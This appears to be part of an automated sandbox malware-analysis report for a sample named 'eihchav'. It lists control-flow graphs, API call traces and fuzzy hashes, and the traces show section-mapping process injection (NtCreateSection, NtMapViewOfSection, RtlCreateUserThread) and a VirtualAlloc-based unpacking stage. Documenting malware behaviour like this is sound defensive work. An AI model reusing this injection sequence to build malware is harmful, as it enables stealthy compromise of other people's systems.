                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 158 4018c5 153->158 159 4018bc-4018e3 call 401193 153->159 158->159 162->152 164 4015e1-401605 NtCreateSection 162->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 168 40168d-401691 166->168 167->166 170 40162a-401646 NtMapViewOfSection 167->170 168->152 171 401697-4016b8 NtMapViewOfSection 168->171 170->166 173 401648-40165e 170->173 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->152 177 4016e0 call 4016e5 174->177
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                            • String ID:
                                                                                            • API String ID: 1652636561-0
                                                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 202 4018c5 197->202 203 4018bc-4018e3 call 401193 197->203 202->203 206->196 208 4015e1-401605 NtCreateSection 206->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 212 40168d-401691 210->212 211->210 214 40162a-401646 NtMapViewOfSection 211->214 212->196 215 401697-4016b8 NtMapViewOfSection 212->215 214->210 217 401648-40165e 214->217 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->196 221 4016e0 call 4016e5 218->221
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 241 4018c5 236->241 242 4018bc-4018e3 call 401193 236->242 241->242 245->235 247 4015e1-401605 NtCreateSection 245->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 251 40168d-401691 249->251 250->249 253 40162a-401646 NtMapViewOfSection 250->253 251->235 254 401697-4016b8 NtMapViewOfSection 251->254 253->249 256 401648-40165e 253->256 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->235 260 4016e0 call 4016e5 257->260
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 281 4018c5 276->281 282 4018bc-4018e3 call 401193 276->282 281->282 285->275 287 4015e1-401605 NtCreateSection 285->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 291 40168d-401691 289->291 290->289 293 40162a-401646 NtMapViewOfSection 290->293 291->275 294 401697-4016b8 NtMapViewOfSection 291->294 293->289 296 401648-40165e 293->296 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->275 300 4016e0 call 4016e5 297->300
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1921587553-0
                                                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 209003c-2090047 1 2090049 0->1 2 209004c-2090263 call 2090a3f call 2090e0f call 2090d90 VirtualAlloc 0->2 1->2 17 209028b-2090292 2->17 18 2090265-2090289 call 2090a69 2->18 19 20902a1-20902b0 17->19 21 20902ce-20903c2 VirtualProtect call 2090cce call 2090ce7 18->21 19->21 22 20902b2-20902cc 19->22 29 20903d1-20903e0 21->29 22->19 30 2090439-20904b8 VirtualFree 29->30 31 20903e2-2090437 call 2090ce7 29->31 33 20904be-20904cd 30->33 34 20905f4-20905fe 30->34 31->29 35 20904d3-20904dd 33->35 36 209077f-2090789 34->36 37 2090604-209060d 34->37 35->34 39 20904e3-2090505 35->39 40 209078b-20907a3 36->40 41 20907a6-20907b0 36->41 37->36 42 2090613-2090637 37->42 51 2090517-2090520 39->51 52 2090507-2090515 39->52 40->41 44 209086e-20908be LoadLibraryA 41->44 45 20907b6-20907cb 41->45 46 209063e-2090648 42->46 50 20908c7-20908f9 44->50 48 20907d2-20907d5 45->48 46->36 49 209064e-209065a 46->49 53 2090824-2090833 48->53 54 20907d7-20907e0 48->54 49->36 55 2090660-209066a 49->55 56 20908fb-2090901 50->56 57 2090902-209091d 50->57 58 2090526-2090547 51->58 52->58 62 2090839-209083c 53->62 59 20907e2 54->59 60 20907e4-2090822 54->60 61 209067a-2090689 55->61 56->57 63 209054d-2090550 58->63 59->53 60->48 64 209068f-20906b2 61->64 65 2090750-209077a 61->65 62->44 66 209083e-2090847 62->66 68 20905e0-20905ef 63->68 69 2090556-209056b 63->69 70 20906ef-20906fc 64->70 71 20906b4-20906ed 64->71 65->46 72 2090849 66->72 73 209084b-209086c 66->73 68->35 74 209056d 69->74 75 209056f-209057a 69->75 76 209074b 70->76 77 20906fe-2090748 70->77 71->70 72->44 73->62 74->68 79 209059b-20905bb 75->79 80 209057c-2090599 75->80 76->61 77->76 84 20905bd-20905db 79->84 80->84 84->63
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0209024D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_2090000_eihchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID: cess$kernel32.dll
                                                                                            • API String ID: 4275171209-1230238691
                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction ID: 571f571e7d084fd000c4ea48e79ccf4338d86c462d87e49f6c0699987f3fdcf7
                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction Fuzzy Hash: D4526A74A01229DFDBA4CF58C984BADBBB1BF09314F1480D9E54EAB351DB30AA85DF14

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 319 5dfa3e-5dfa57 320 5dfa59-5dfa5b 319->320 321 5dfa5d 320->321 322 5dfa62-5dfa6e CreateToolhelp32Snapshot 320->322 321->322 323 5dfa7e-5dfa8b Module32First 322->323 324 5dfa70-5dfa76 322->324 325 5dfa8d-5dfa8e call 5df6fd 323->325 326 5dfa94-5dfa9c 323->326 324->323 329 5dfa78-5dfa7c 324->329 330 5dfa93 325->330 329->320 329->323 330->326
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005DFA66
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 005DFA86
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5cd000_eihchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: 3097cd784c994e762c5b5d75cbe1c0bc534667ab0dcdb442f5a1a72c50493ffd
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: 72F062311007116BD7302BFD988DB6E7AE8BF49724F10053BE64B916C0DB74EC458B61

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 332 2090e0f-2090e24 SetErrorMode * 2 333 2090e2b-2090e2c 332->333 334 2090e26 332->334 334->333
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02090223,?,?), ref: 02090E19
                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02090223,?,?), ref: 02090E1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_2090000_eihchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction ID: 10129a3fe212e682639f71971b88a6d26267ce46d9308158a6e3ab39f2dfc045
                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction Fuzzy Hash: 5DD0123514522877DB412A94DC09BCD7B5DDF05B66F008011FB0DD9080C770954046E5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 444 5df6fd-5df737 call 5dfa10 447 5df739-5df76c VirtualAlloc call 5df78a 444->447 448 5df785 444->448 450 5df771-5df783 447->450 448->448 450->448
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005DF74E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5cd000_eihchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: 039c5ed7a1010e4924be1c16ab3437b602c96d0a3f0e4449863e08e1cbcb80d4
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: 48112A79A00208EFDB01DF98C989E98BFF5AB08350F0580A5F9499B362D371EA50DB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.3%
                                                                                            Dynamic/Decrypted Code Coverage:42.5%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:113
                                                                                            Total number of Limit Nodes:4
